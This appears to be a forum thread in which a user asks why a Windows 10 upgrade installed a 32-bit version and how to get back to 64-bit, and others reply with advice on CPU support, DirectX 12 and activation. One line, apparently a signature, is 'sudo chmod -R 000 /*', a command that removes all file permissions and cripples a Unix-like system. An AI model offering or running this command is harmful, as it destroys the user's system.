I have a computer with this specs:

-Intel Pentium g630 2.7GHz

-Kingston 4gb Ram 1333MHz

-Asus p8 H61-M LX R2.0

-Windows 7 Home 64-bit (not preinstalled)

-No graphicscard yet (turning this pc into a gaming pc)

I did the free upgrade to windows 10 on this computer, because i thought it would be better for gaming with DirectX 12. After it was done i saw it had installed a 32-bit windows 10. Did i miss to click 64-bit while updating? I thought that my computer has the right specs for windows 10 64-bit. I wanted to go back to windows 7 64-bit but in the settings i couldnt see this option. Is that because i didnt make a back-up in windows 7? I still have the product key for windows 7 which i already used on this pc, can i use it again? And does it really matter for gaming which bit version you have? I hope you can help me.

Yes, your cpu does support 64 bit. Do as @Luricksuggested and you should be fine.

By the way, don't expect dx12 to make a difference - first of all because old games don't magically get it and it will only work on new games that support it. Secondly, because the cpu is pretty bad (not to mention if you plan on running on integrated graphics you'll be limited to dx10 anyway).

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Windows 10 x64 will probably get activated automatically if you make a clean install. Could be it doesn't, though, since the hardware is associated with an x86 install rather than x64. I believe it's worth a shot, though. For science. You could always put the Windows 7 key in later if it doesn't work automagically.
